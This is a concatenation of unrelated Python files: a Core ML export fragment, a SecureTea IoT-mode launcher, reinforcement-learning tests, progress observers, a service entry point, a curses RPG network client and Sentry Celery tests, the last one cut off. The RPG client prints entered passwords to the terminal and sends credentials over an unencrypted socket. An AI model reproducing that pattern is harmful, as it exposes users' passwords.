# end: Non maximum suppression model
model.description.output[0].name = 'confidence'
model.description.output[1].name = 'coordinates'
iouThresholdString = '(optional) IOU Threshold override (default: {})'
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
mlmodel = coremltools.models.MLModel(model)
model_type = 'object detector (%s)' % self.model
mlmodel.short_description = _coreml_utils._mlmodel_short_description(
model_type)
mlmodel.input_description[self.feature] = 'Input image'
if include_non_maximum_suppression:
iouThresholdString = '(optional) IOU Threshold override (default: {})'
mlmodel.input_description['iouThreshold'] = \
iouThresholdString.format(iou_threshold)
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
mlmodel.input_description['confidenceThreshold'] = \
confidenceThresholdString.format(confidence_threshold)
mlmodel.output_description['confidence'] = \
u'Boxes \xd7 Class confidence (see user-defined metadata "classes")'
mlmodel.output_description['coordinates'] = \
u'Boxes \xd7 [x, y, width, height] (relative to image size)'
_coreml_utils._set_model_metadata(mlmodel, self.__class__.__name__, {
'model': self.model,
'max_iterations': str(self.max_iterations),
'training_iterations': str(self.training_iterations),
'include_non_maximum_suppression': str(
include_non_maximum_suppression),
'non_maximum_suppression_threshold': str(
iou_threshold),
'confidence_threshold': str(confidence_threshold),
'iou_threshold': str(iou_threshold),
'feature': self.feature,
'annotations': self.annotations,
'classes': ','.join(self.classes),
}, version=ObjectDetector._PYTHON_OBJECT_DETECTOR_VERSION)
mlmodel.save(filename)
|
iot_mode.py
|
# -*- coding: utf-8 -*-
u"""IoT Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com>, Jul 31 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for IoT mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.iot import iot_checker
from securetea import logger
import multiprocessing
import sys
class IoTMode(object):
"""IoTMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize IoTMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns:
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize module presence flags as False
self.firewall = False
self.ids = False
self.iot_checker = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, IoT Checker) objects
if configuration parameters are available for these.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
try:
self.logger.log(
"Initializing IoT checker object",
logtype="info"
)
# Initialize IoT Checker object
self.iot_checker_obj = iot_checker.IoTChecker(debug=self.debug,
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
# Mark the IoT checker as initialized so that create_process() starts it
self.iot_checker = True
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.iot_checker: # if IoT object is initialized
iot_checker_process = multiprocessing.Process(target=self.iot_checker_obj.check_shodan_range)
self.process_pool.append(iot_checker_process)
def start_process(self):
"""
Start all the processes in the process pool
and terminate them gracefully on KeyboardInterrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_iot_mode(self):
"""
Start SecureTea in IoT mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
iteration_test.py
|
import os
import pickle
import tempfile
import time
from threading import Thread
import pytest
from numpy.random import RandomState
from rlai.agents.mdp import StochasticMdpAgent
from rlai.environments.gridworld import Gridworld, GridworldFeatureExtractor
from rlai.environments.mdp import TrajectorySamplingMdpPlanningEnvironment
from rlai.gpi import PolicyImprovementEvent
from rlai.gpi.monte_carlo.iteration import iterate_value_q_pi
from rlai.gpi.utils import update_policy_iteration_plot, plot_policy_iteration
from rlai.planning.environment_models import StochasticEnvironmentModel
from rlai.policies.tabular import TabularPolicy
from rlai.q_S_A.function_approximation.estimators import ApproximateStateActionValueEstimator
from rlai.q_S_A.function_approximation.models.sklearn import SKLearnSGD
from rlai.q_S_A.tabular import TabularStateActionValueEstimator
from rlai.utils import RunThreadManager
from test.rlai.utils import tabular_estimator_legacy_eq, tabular_pi_legacy_eq
def test_iterate_value_q_pi():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=3000,
num_episodes_per_improvement=1,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A
)
# uncomment the following lines and run the test to update the fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_iteration_of_value_q_pi.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_iteration_of_value_q_pi.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert tabular_pi_legacy_eq(mdp_agent.pi, pi_fixture) and tabular_estimator_legacy_eq(q_S_A, q_S_A_fixture)
def test_off_policy_monte_carlo():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.0, None)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# uncomment the following lines and run the test to update the fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_off_policy_iteration_of_value_q_pi.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_off_policy_iteration_of_value_q_pi.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert tabular_pi_legacy_eq(mdp_agent.pi, pi_fixture) and tabular_estimator_legacy_eq(q_S_A, q_S_A_fixture)
def test_off_policy_monte_carlo_with_function_approximation():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = ApproximateStateActionValueEstimator(
mdp_environment,
0.05,
SKLearnSGD(random_state=random_state, scale_eta0_for_y=False),
GridworldFeatureExtractor(mdp_environment),
None,
False,
None,
None
)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
TabularPolicy(None, None),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# uncomment the following lines and run the test to update the fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_off_policy_monte_carlo_with_function_approximationo.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_off_policy_monte_carlo_with_function_approximationo.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert mdp_agent.pi == pi_fixture and q_S_A == q_S_A_fixture
assert str(mdp_agent.pi.estimator[mdp_environment.SS[5]][mdp_environment.SS[5].AA[1]]).startswith('-1.4524')
# make greedy
q_S_A.epsilon = 0.0
assert q_S_A.improve_policy(mdp_agent, None, PolicyImprovementEvent.MAKING_POLICY_GREEDY) == -1
assert mdp_agent.pi.estimator.epsilon == 0.0
def test_invalid_iterate_value_q_pi():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.0, None)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
with pytest.raises(ValueError, match='Planning environments are not currently supported for Monte Carlo iteration.'):
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=TrajectorySamplingMdpPlanningEnvironment('foo', random_state, StochasticEnvironmentModel(), 100, None),
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# test warning...no off-policy agent with epsilon=0.0
q_S_A.epsilon = 0.0
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=None
)
def test_iterate_value_q_pi_with_pdf():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=3000,
num_episodes_per_improvement=1,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
num_improvements_per_plot=1500,
pdf_save_path=tempfile.NamedTemporaryFile(delete=False).name
)
with pytest.raises(ValueError, match='Epsilon must be >= 0'):
q_S_A.epsilon = -1.0
q_S_A.improve_policy(mdp_agent, states=None, event=PolicyImprovementEvent.MAKING_POLICY_GREEDY)
q_S_A.epsilon = 0.0
assert q_S_A.improve_policy(mdp_agent, None, PolicyImprovementEvent.MAKING_POLICY_GREEDY) == 14
def test_iterate_value_q_pi_multi_threaded():
thread_manager = RunThreadManager(True)
def train_thread_target():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=1000000,
num_episodes_per_improvement=10,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
thread_manager=thread_manager,
num_improvements_per_plot=10
)
# premature update should have no effect
assert update_policy_iteration_plot() is None
# initialize plot from main thread
plot_policy_iteration(
iteration_average_reward=[],
iteration_total_states=[],
iteration_num_states_improved=[],
elapsed_seconds_average_rewards={},
pdf=None
)
# run training thread
run_thread = Thread(target=train_thread_target)
run_thread.start()
time.sleep(1)
# update plot asynchronously
update_policy_iteration_plot()
time.sleep(1)
# should not be allowed to update the plot from a non-main thread
def bad_update():
with pytest.raises(ValueError, match='Can only update plot on main thread.'):
update_policy_iteration_plot()
bad_thread = Thread(target=bad_update)
bad_thread.start()
bad_thread.join()
thread_manager.abort = True
run_thread.join()
|
observers.py
|
# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from threading import Thread
from multiprocessing.queues import Empty
from uuid import uuid4
from blessings import Terminal
try:
from cameo.parallel import RedisQueue
except ImportError:
RedisQueue = None
from IProgress.progressbar import ProgressBar
from IProgress.widgets import Percentage, Bar
__all__ = ['CliMultiprocessProgressObserver', 'IPythonNotebookMultiprocessProgressObserver']
class AbstractParallelObserver(object):
def __init__(self, number_of_islands=None, *args, **kwargs):
assert isinstance(number_of_islands, int)
super(AbstractParallelObserver, self).__init__()
self.queue = RedisQueue(name=str(uuid4()), namespace=self.__name__)
self.clients = {}
self.run = True
self.t = None
for i in range(number_of_islands):
self._create_client(i)
def _create_client(self, i):
raise NotImplementedError
def _listen(self):
print("Start %s" % self.__name__)
while self.run:
try:
message = self.queue.get_nowait()
self._process_message(message)
except Empty:
pass
except Exception as e:
print(e)
print("Exit %s" % self.__name__)
def _process_message(self, message):
raise NotImplementedError
def start(self):
"""
Starts the observer. It is called internally before the optimization starts.
The observer will not report anything until start has been called.
"""
self.run = True
self.t = Thread(target=self._listen)
self.t.start()
def finish(self):
"""
Stops the observer. The observer will not report anything else from the optimization.
"""
self.run = False
class AbstractParallelObserverClient(object):
def __init__(self, index=None, queue=None, *args, **kwargs):
assert isinstance(index, int)
super(AbstractParallelObserverClient, self).__init__(*args, **kwargs)
self.index = index
self._queue = queue
def __call__(self, population, num_generations, num_evaluations, args):
raise NotImplementedError
def reset(self):
pass
class CliMultiprocessProgressObserver(AbstractParallelObserver):
"""
Command line progress display for multiprocess Heuristic Optimization
Attributes
----------
progress_bar: dict
Progress bar for each island.
terminal: Terminal
A blessings.Terminal object to map the bars in the terminal
"""
__name__ = "CLI Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
self.progress_bar = {}
self.terminal = Terminal()
super(CliMultiprocessProgressObserver, self).__init__(*args, **kwargs)
def _create_client(self, i):
self.clients[i] = CliMultiprocessProgressObserverClient(index=i, queue=self.queue)
def _process_message(self, message):
i = message['index']
if i not in self.progress_bar:
print("")
label = "Island %i: " % (i + 1)
pos = abs(len(self.clients) - i)
writer = self.TerminalWriter((self.terminal.height or 1) - pos, self.terminal)
self.progress_bar[i] = ProgressBar(maxval=message['max_evaluations'],
widgets=[label, Bar(), Percentage()],
fd=writer)
self.progress_bar[i].start()
self.progress_bar[i].update(message['num_evaluations'])
def _listen(self):
AbstractParallelObserver._listen(self)
for i, progress in self.progress_bar.items():
progress.finish()
class TerminalWriter(object):
"""
Writer wrapper to write the progress in a specific terminal position
"""
def __init__(self, pos, term):
self.pos = pos
self.term = term
def write(self, string):
with self.term.location(0, self.pos):
print(string)
class CliMultiprocessProgressObserverClient(AbstractParallelObserverClient):
__name__ = "CLI Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
super(CliMultiprocessProgressObserverClient, self).__init__(*args, **kwargs)
def __call__(self, population, num_generations, num_evaluations, args):
self._queue.put_nowait({
'index': self.index,
'num_evaluations': num_evaluations,
'max_evaluations': args.get('max_evaluations', 50000)
})
def reset(self):
pass
class IPythonNotebookMultiprocessProgressObserver(AbstractParallelObserver):
"""
IPython Notebook Progress Observer for multiprocess Heuristic Optimization
Attributes
----------
progress_bar: dict
Progress bar for each island.
"""
__name__ = "IPython Notebook Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
self.progress_bar = {}
super(IPythonNotebookMultiprocessProgressObserver, self).__init__(*args, **kwargs)
def _create_client(self, i):
self.clients[i] = IPythonNotebookMultiprocessProgressObserverClient(queue=self.queue, index=i)
def _process_message(self, message):
i = message['index']
if i not in self.progress_bar:
label = "Island %i" % (i + 1)
self.progress_bar[i] = ProgressBar(maxval=message['max_evaluations'],
widgets=[label, Bar(), Percentage()])
self.progress_bar[message['index']].start()
self.progress_bar[message['index']].set(message['progress'])
class IPythonNotebookMultiprocessProgressObserverClient(AbstractParallelObserverClient):
__name__ = "IPython Notebook Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
super(IPythonNotebookMultiprocessProgressObserverClient, self).__init__(*args, **kwargs)
def __call__(self, population, num_generations, num_evaluations, args):
p = (float(num_evaluations) / float(args.get('max_evaluations', 50000))) * 100.0
try:
self._queue.put_nowait({'progress': p, 'index': self.index})
except Exception:
pass
def reset(self):
pass
|
main.py
|
from ros.processor.inventory_events_consumer import InventoryEventsConsumer
from ros.processor.insights_engine_result_consumer import InsightsEngineResultConsumer
from ros.processor.garbage_collector import GarbageCollector
from prometheus_client import start_http_server
import threading
from ros.lib.config import METRICS_PORT
def process_engine_results():
processor = InsightsEngineResultConsumer()
processor.run()
def events_processor():
processor = InventoryEventsConsumer()
processor.run()
def garbage_collector():
collector = GarbageCollector()
collector.run()
if __name__ == "__main__":
# Start processing in 3 different threads
engine_results = threading.Thread(name='process-engine-results', target=process_engine_results)
events = threading.Thread(name='events-processor', target=events_processor)
collector = threading.Thread(name='garbage-collector', target=garbage_collector)
events.start()
engine_results.start()
collector.start()
start_http_server(METRICS_PORT)
# Wait for threads to finish
events.join()
engine_results.join()
collector.join()
|
main.py
|
# / ┌─────────────┐ \ #
# |==│ By BitExpo3 │==| #
# \ └─────────────┘ / #
import socket
import threading
import sys
import json
import curses
from curses import wrapper
import yaml
import os
wmain = None
wside = None
wbar = None
winy, winx = None, None
state = ""
# Official server IP & PORT coming soon!
SERVER = socket.gethostbyname(socket.gethostname()) # SERVER IP: STR ("127.0.0.1")
PORT = 5052 # SERVER PORT: INT (5000)
ADDR = (SERVER, PORT)
HEADER = 64
FORMAT = "utf-8"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(2)
RUNNING = True
GAMEVERSION = 1
LOADED = False
DATA = {}
TUI = {
"msg": "",
"chat": []
}
class YamlManager:
def read(directory):
with open(directory) as file:
try:
output = yaml.safe_load(file)
return output
except yaml.YAMLError as exc:
print(exc)
return False
def write(directory,data):
with open(directory, 'w') as file:
yaml.dump(data, file)
def dir(directory):
tmp = []
for files in os.listdir(directory):
if os.path.isdir(os.path.join(directory, files)):
tmp.append(files)
return tmp
def file(directory):
tmp = []
for files in os.listdir(directory):
if os.path.isfile(os.path.join(directory, files)):
tmp.append(files)
return tmp
def name(file):
return file.split(".")[0]
file = YamlManager
class ColorClass:
GREEN = None
RED = None
YELLOW = None
BLUE = None
PURPLE = None
def init(self):
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
self.GREEN = curses.color_pair(1)
self.RED = curses.color_pair(2)
self.YELLOW = curses.color_pair(3)
self.BLUE = curses.color_pair(4)
self.PURPLE = curses.color_pair(5)
color = ColorClass
class ProtocolClass():
SOC = "s" # socket management
ACC = "a" # account type command
REA = "r" # command with read nature
WRI = "w" # command with write nature
msg_types = ProtocolClass
def resize(stdscr):
global wmain, wside, wbar, winy, winx
winy,winx = stdscr.getmaxyx()
wmain = curses.newwin(winy-3,winx-29,3,29)
wside = curses.newwin(winy-3,30,3,0)
wbar = curses.newwin(4,winx,0,0)
def update(data):
global state, substate
wmain.clear()
wside.clear()
wbar.clear()
wmain.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("─"),ord("┘"),ord("┘"),ord("┘"))
wside.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("└"),ord("─"),ord("└"),ord("┘"))
wbar.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("┌"),ord("┐"),ord("└"),ord("┘"))
wbar.addstr(1,1,f"AnotherRPG")
if state == "login":
wbar.addstr(2,1,"Log-In to account!")
else:
if LOADED:
print(data)
wbar.addstr(2,1,f"Inv: " + str(data["weight"]))
amount = 0
for i in range(len(TUI["chat"])):
if amount >= winy-5:
break
wmain.addstr((winy-5)-i,1,TUI["chat"][i][0] + ": " + TUI["chat"][i][1])
amount += 1
if TUI["msg"] != "":
wbar.addstr(1,11," // " + TUI["msg"])
wbar.refresh()
wmain.refresh()
wside.refresh()
curses.curs_set(0)
def getstring(max,title,var):
wmain.hline(winy-6, 1, ord("─"), winx-31)
wmain.addstr(winy-6,2,title)
wmain.addstr(winy-5,1," "*(winx-31))
wmain.addstr(winy-5,1,var + ": ")
wmain.addstr(winy-6,winx-30,"┘")
wmain.addstr(winy-5,winx-(36 + len(str(max))),f"(Max {max})")
wmain.refresh()
wmain.move(winy-5,3 + len(str(var)))
curses.echo()
string = wmain.getstr(max).decode().strip()
curses.noecho()
return str(string)
def receive():
global LOADED
global RUNNING
global DATA
global state, substate
while True:
if not RUNNING:
print("Closing Thread..")
return
try:
msg_length = client.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = client.recv(msg_length).decode(FORMAT).split("\n")
if msg[0] == msg_types.SOC:
if msg[1] == "!":
print("Server Closed!")
RUNNING = False
sys.exit()
elif msg[1].startswith("v"):
tmp = str(msg[1].split(" ")[1])
if str(tmp) != str(GAMEVERSION):
print("Wrong version! Server: v" + str(tmp) + " Client: v" + str(GAMEVERSION))
print("- Go to: [https://github.com/BitExpo3/Client] for the latest release!")
print("('\\n' to leave)")
RUNNING = False
send(msg_types.SOC + "\n!")
sys.exit()
else:
print("Client Up To Date! (v" + str(GAMEVERSION) + ")")
elif msg[0] == msg_types.REA:
if msg[1].startswith("msg "):
tmp = msg[1].split(" ")
TUI["chat"].insert(0,[tmp[1],msg[1][len("msg " + tmp[1] + " "):]])
else:
if msg[1] == "FINAL":
LOADED = True
else:
data_dict = json.loads(str(msg[2]).replace("'","\""))
DATA[msg[1]] = data_dict[0]
elif msg[0] == msg_types.ACC:
if len(msg) > 1:
if msg[1] == "0":
TUI["msg"] = ("Invalid email syntax!")
elif msg[1] == "1":
TUI["msg"] = ("User or Password incorrect!")
elif msg[1] == "2":
TUI["msg"] = ("Logged in to account!")
state = "game"
send(msg_types.REA + "\n" + "all")
elif msg[1] == "3":
TUI["msg"] = ("Account already exists!")
elif msg[1] == "4":
TUI["msg"] = ("Verification email sent! Please send token with '!token [token]'")
elif msg[1] == "5":
TUI["msg"] = ("You do not have a pending token!")
elif msg[1] == "6":
TUI["msg"] = ("Token is not valid!")
elif msg[1] == "7":
TUI["msg"] = ("You have created an account!")
state = "game"
send(msg_types.REA + "\n" + "all")
TUI["msg"] = ("Logged in to account!")
elif msg[1] == "8":
TUI["msg"] = ("You must be logged in to do this!")
#update(DATA)
except TimeoutError:
pass
def send(msg):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
def main(stdscr):
global RUNNING
global wmain, wside, wbar
global winy, winx
global state, TUI
color.init(color)
resize(stdscr)
stdscr.timeout(100)
worked = True
try:
client.connect(ADDR)
except:
print("[ERROR] Connection unsucessful, please try again later.")
worked = False
RUNNING = False
sys.exit()
input()
if worked:
state = "login"
TUI["msg"] = ("Connected to server!")
thread1 = threading.Thread(target=receive)
thread1.daemon = True  # run the receiver as a daemon so it exits with the main thread
thread1.start()
while RUNNING:
try:
key = stdscr.getch()
except curses.error:
key = None
if key == ord("q"):
RUNNING = False
send(msg_types.SOC + "\n!")
sys.exit()
elif key == ord("m"):
msg = getstring(50,"Message","")
send(msg_types.WRI + "\nmsg " + msg)
elif key == ord("t"):
msg = getstring(50,"Command","")
msg = msg.lower().strip()
if msg == "login":
name = getstring(30,"Login","User")
password = getstring(20,"Login","Pass")
send(msg_types.ACC + "\n0\n" + name + "\n" + password)
elif msg == "register":
if state == "login":
email = getstring(30,"Register","EMail")
password = getstring(20,"Register","Pass")
name = getstring(20,"Register","User")
print(password)
print(password.isalnum())
print(len(password) <= 20)
print(len(password) >= 5)
if password.isalnum() and 5 <= len(password) <= 20 and name.isalnum() and 3 <= len(name) <= 20:
send(msg_types.ACC + "\n1\n" + email + "\n" + password + "\n" + name)
else:
TUI["msg"] = ("Password and User must be alphanumeric, and 5 - 20 characters long!")
else:
TUI["msg"] = ("You can not do this while logged in!")
elif msg == "token":
token = getstring(30,"Register","Token")
if state == "login":
send(msg_types.ACC + "\n2\n" + token)
else:
TUI["msg"] = ("You can not do this while logged in!")
else:
TUI["msg"] = "Unknown command."
if key == 546:
resize(stdscr)
update(DATA)
else:
update(DATA)
wrapper(main)
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk._compat import text_type
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True, **kwargs):
sentry_init(
integrations=[CeleryIntegration(propagate_traces=propagate_traces)],
**kwargs
)
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.fixture(
params=[
lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (
task.apply_async(args=(x, y)),
{"args": [x, y], "kwargs": {}},
),
lambda task, x, y: (
task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": x, "y": y}},
),
]
)
def celery_invocation(request):
"""
Invokes a task in the multiple ways Celery allows (testing our apply_async monkeypatch).
Currently limited to a task signature of the form foo(x, y).
"""
return request.param
def test_simple(capture_events, celery, celery_invocation):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
with Hub.current.start_span() as span:
celery_invocation(dummy_task, 1, 2)
_, expected_context = celery_invocation(dummy_task, 1, 0)
(event,) = events
assert event["contexts"]["trace"]["trace_id"] == span.trace_id
assert event["contexts"]["trace"]["span_id"] != span.span_id
assert event["transaction"] == "dummy_task"
assert "celery_task_id" in event["tags"]
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
@pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"])
def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails):
celery = init_celery(traces_sample_rate=1.0)
@celery.task(name="dummy_task")
def dummy_task(x, y):
return x / y
# XXX: For some reason the first call does not get instrumented properly.
celery_invocation(dummy_task, 1, 1)
events = capture_events()
with Hub.current.start_span(transaction="submission") as span:
celery_invocation(dummy_task, 1, 0 if task_fails else 1)
if task_fails:
error_event = events.pop(0)
assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError"
execution_event, submission_event = events
assert execution_event["transaction"] == "dummy_task"
assert submission_event["transaction"] == "submission"
assert execution_event["type"] == submission_event["type"] == "transaction"
assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id
if task_fails:
assert execution_event["contexts"]["trace"]["status"] == "internal_error"
else:
assert execution_event["contexts"]["trace"]["status"] == "ok"
assert execution_event["spans"] == []
assert submission_event["spans"] == [
{
u"description": u"dummy_task",
u"op": "celery.submit",
u"parent_span_id": submission_event["contexts"]["trace"]["span_id"],
u"same_process_as_parent": True,
u"span_id": submission_event["spans"][0]["span_id"],
u"start_timestamp": submission_event["spans"][0]["start_timestamp"],
u"timestamp": submission_event["spans"][0]["timestamp"],
u"trace_id": text_type(span.trace_id),
}
]
def test_no_stackoverflows(celery):
"""We used to have a bug in the Celery integration where its monkeypatching
was repeated for every task invocation, leading to stackoverflows.
See https://github.com/getsentry/sentry-python/issues/265
"""
results = []
